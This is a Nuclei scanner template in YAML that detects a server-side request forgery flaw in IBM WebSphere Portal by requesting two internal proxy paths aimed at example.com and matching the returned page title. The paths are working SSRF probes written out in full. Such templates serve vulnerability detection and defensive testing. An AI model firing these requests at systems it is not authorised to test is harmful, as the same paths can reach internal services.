nuclei-templates/vulnerabilities/ibm/ibm-websphere-ssrf.yaml

29 lines
621 B
YAML

id: ibm-websphere-ssrf
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
tags: ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"